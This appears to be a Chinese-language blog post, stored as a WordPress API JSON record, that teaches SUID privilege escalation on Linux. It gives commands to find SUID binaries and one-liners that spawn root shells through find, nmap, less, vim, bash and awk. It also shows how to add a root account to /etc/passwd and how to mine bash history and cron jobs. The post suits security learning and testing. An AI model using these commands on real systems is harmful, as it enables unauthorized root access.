{"id":331,"date":"2026-05-12T21:10:16","date_gmt":"2026-05-12T13:10:16","guid":{"rendered":"https:\/\/arknight.wiki\/?p=331"},"modified":"2026-05-12T21:10:16","modified_gmt":"2026-05-12T13:10:16","slug":"suid%e6%8f%90%e6%9d%83","status":"publish","type":"post","link":"https:\/\/arknight.wiki\/index.php\/2026\/05\/12\/suid%e6%8f%90%e6%9d%83\/","title":{"rendered":"suid\u63d0\u6743"},"content":{"rendered":"<h1>suid\u63d0\u6743\uff1a<\/h1>\n<p>\u539f\u7406\uff1a\u6709suid\u6743\u9650\u7684\u53ef\u6267\u884c\u6587\u4ef6\u5728\u6267\u884c\u8fdb\u7a0b\u65f6\u4f1a\u4ee5\u6587\u4ef6\u6240\u6709\u8005\u6743\u9650\u8fd0\u884c\uff0c\u5982\u679c\u6240\u6709\u8005\u662froot\uff0c\u5c31\u53ef\u4ee5\u5229\u7528suid\u6587\u4ef6\u8fdb\u884c\u63d0\u6743<\/p>\n<p>\u8bbe\u7f6e\uff0c\u79fb\u9664suid\u6743\u9650\uff1a<\/p>\n<pre><code>chmod u+s filename #\u8bbe\u7f6esuid\nchmod u-s filename #\u53bb\u9664suid<\/code><\/pre>\n<h2>\u67e5\u627esuid\u6587\u4ef6\uff1a<\/h2>\n<pre><code>find \/ -user root -perm -4000 -print 2&gt;\/dev\/null\nfind \/ -perm -u=s -type f 2&gt;\/dev\/null\nfind \/ -user root -perm -4000 -exec ls -ldb {} \\;<\/code><\/pre>\n<h2>\u5229\u7528\uff1a<\/h2>\n<h3>find\uff1a<\/h3>\n<pre><code> find \u5177\u6709suid\u6743\u9650\u7684filename -exec whoami ; -quit\n#root\nfind \u5177\u6709suid\u6743\u9650\u7684filename -exec \/bin\/sh -p ; -quit\n#whoami\n#root\u00a0 \n\n #\u5148\u524d\u5229\u7528\u4ee5\u4e0a\u67e5\u627esuid\u6587\u4ef6\u67e5\u8be2\u5230\u4e86\/usr\/bin\/find \u6709suid\u6743\u9650\ntouch 1.txt #\u521b\u5efa1.txt\n\/usr\/bin\/find 1.txt -exec whoami ; \n#\u81f3\u5c11\u8981\u6709\u4e00\u4e2a\u6587\u4ef6\u8def\u5f84\u7ed9find<\/code><\/pre>\n<h3>nmap\uff1a<\/h3>\n<p>nmap\u53ef\u4ee5\u542f\u52a8\u4ea4\u4e92\u5f0fshell\uff0c\u5982\u679c\u6709suid\u5c31\u4f1a\u4ee5root\u6743\u9650\u5f00\u542f\u4e00\u4e2ashell\uff08\u6ce8\u610f\uff1a--interactive \u53ea\u5728\u65e7\u7248\u672c nmap \u4e2d\u53ef\u4ee5\u4f7f\u7528\uff0c\u65b0\u7248\u672c\u5df2\u79fb\u9664\uff09<\/p>\n<pre><code>nmap --interactive \nnmap&gt; !sh\n\nsh-3.2# 
whoami\nroot<\/code><\/pre>\n<p>\u4e5f\u53ef\u4ee5\u8dd1\u811a\u672c<\/p>\n<pre><code>#\u811a\u672c\uff0c\u547d\u540d\u4e3a1.nse\uff1a\nos.execute('\/bin\/sh') \n\n#nmap\u6267\u884c\u547d\u4ee4\nnmap --script=1.nse<\/code><\/pre>\n<h3>less\/more\uff1a<\/h3>\n<p>\u8fd9\u4e24\u4e2a\u5dee\u4e0d\u591a\uff0c\u53ef\u4ee5\u5f00\u4ea4\u4e92\u5f0fshell\uff0c\u4e0d\u8fc7\u8981\u6ce8\u610f\u5fc5\u987b\u67e5\u770b\u5927\u6587\u4ef6\uff0c\u4e0d\u7136\u8fdb\u5165\u4e0d\u4e86\u7ffb\u9875\uff0c\u8fd9\u6837\u65e0\u6cd5\u7528<code>!<\/code>\u547d\u4ee4\u8fdb\u5165shell\u3002<\/p>\n<pre><code>less \/etc\/passwd \n!\/bin\/sh \n\nVISUAL=\"\/bin\/sh -c '\/bin\/sh'\" less \/etc\/profile\nv \n#less \u5728\u67e5\u770b\u6587\u4ef6\u65f6\uff0c\u5982\u679c\u4f60\u6309\u4e0b v \u952e\uff08\u4ee3\u8868 \u201cvisual edit\u201d\uff09\uff0c\u5b83\u4f1a\u5c1d\u8bd5\u8c03\u7528\u5916\u90e8\u7f16\u8f91\u5668\u3002less \u4f18\u5148\u4f7f\u7528 $VISUAL \u73af\u5883\u53d8\u91cf\u6307\u5b9a\u7684\u7f16\u8f91\u5668\uff1b\u5982\u679c\u672a\u8bbe\u7f6e\uff0c\u5219\u56de\u9000\u5230 $EDITOR\u3002\u8fd9\u91cc\u6211\u4eec\u8bbe\u7f6e\u4e3ashell\u3002\n<\/code><\/pre>\n<h3>nano\uff1a<\/h3>\n<pre><code>nano\nctrl + R\nctrl + X\n#shell<\/code><\/pre>\n<h3>cp\/mv\uff1a<\/h3>\n<p>\u7528root\u6743\u9650\u6539\/etc\/passwd\uff0c\u5199\u5165\u4e00\u4e2a\u65b0\u7684root\u6743\u9650\u8d26\u6237<\/p>\n<pre><code>cat \/etc\/passwd \n#\u770b\u683c\u5f0f\nopenssl passwd -1 -salt test testaaa\n#\u5f97\u5230md5-crypt\u683c\u5f0f\u7684\u5bc6\u7801\u54c8\u5e0c\uff1a$1$test$giCVmzusADSPMon2mwEWo1 \necho 'test:$1$test$giCVmzusADSPMon2mwEWo1:0:0::\/root\/:\/bin\/sh' &gt;&gt; passwd \ncp passwd \/etc\/passwd \nsu - test <\/code><\/pre>\n<h3>vi\/vim\uff1a<\/h3>\n<pre><code>vim.tiny \/etc\/passwd \n:!\/bin\/sh<\/code><\/pre>\n<h3>bash\uff1a<\/h3>\n<pre><code>bash -p\n#\u751f\u6210\u4e00\u4e2a  bash-3.2# \nbash-3.2# id\n#uid=1024(qsdz) gid=999(qsdz) euid=0(root) groups=999(qsdz)<\/code><\/pre>\n<h3>awk\uff1a<\/h3>\n<p>AWK 
\u7684\u4e3b\u8981\u5de5\u4f5c\u662f<strong>\u9010\u884c\u8bfb\u53d6\u6587\u4ef6<\/strong>\uff0c\u6839\u636e\u6307\u5b9a\u7684\u89c4\u5219\u5bf9\u6bcf\u4e00\u884c\u8fdb\u884c\u5339\u914d\u548c\u5904\u7406\u3002<\/p>\n<p>\u8bed\u6cd5\uff1a<code>awk '\u6761\u4ef6 { \u52a8\u4f5c }' \u6587\u4ef6\u540d<\/code><\/p>\n<pre><code>awk 'BEGIN {system(\"\/bin\/bash\")}'<\/code><\/pre>\n<h3>\u4e00\u4e9b\u6bd4\u8f83\u795e\u79d8\u7684\uff1a<\/h3>\n<pre><code>cat ~\/.bash_history \n#\u8fd9\u4e2a\u547d\u4ee4\u53ef\u4ee5\u67e5\u770b\u5f53\u524d\u7528\u6237\u4f7f\u7528\u8fc7\u7684\u5386\u53f2\u547d\u4ee4\n#\u6709\u53ef\u80fd\u4f1a\u5f97\u5230root\u767b\u5f55\u7684\u5bc6\u7801 \n\nls -l \/etc\/cron*\n#\u67e5\u770b\u5b9a\u671f\u6267\u884c\u7684\u8ba1\u5212\u4efb\u52a1\uff0c\u5982\u679c\u6709\u7528\u6237\u5199\u7684\u811a\u672c\uff0c\u90a3\u4e48\u6211\u4eec\u53ef\u4ee5\u8fdb\u884c\u811a\u672c\u7684\u4fee\u6539\u7136\u540e\u56de\u8fderootshell\uff0c\u4ece\u800c\u63d0\u6743 \n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>suid\u63d0\u6743\uff1a \u539f\u7406\uff1a\u6709suid\u6743\u9650\u7684\u53ef\u6267\u884c\u6587\u4ef6\u5728\u6267\u884c\u8fdb\u7a0b\u65f6\u4f1a\u4ee5\u6587\u4ef6\u6240\u6709\u8005\u6743\u9650\u8fd0\u884c\uff0c\u5982\u679c\u6240\u6709\u8005\u662froot\uff0c\u5c31\u53ef 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-331","post","type-post","status-publish","format-standard","hentry","category-3"],"_links":{"self":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/331","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/comments?post=331"}],"version-history":[{"count":1,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/331\/revisions"}],"predecessor-version":[{"id":332,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/331\/revisions\/332"}],"wp:attachment":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/media?parent=331"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/categories?post=331"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/tags?post=331"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}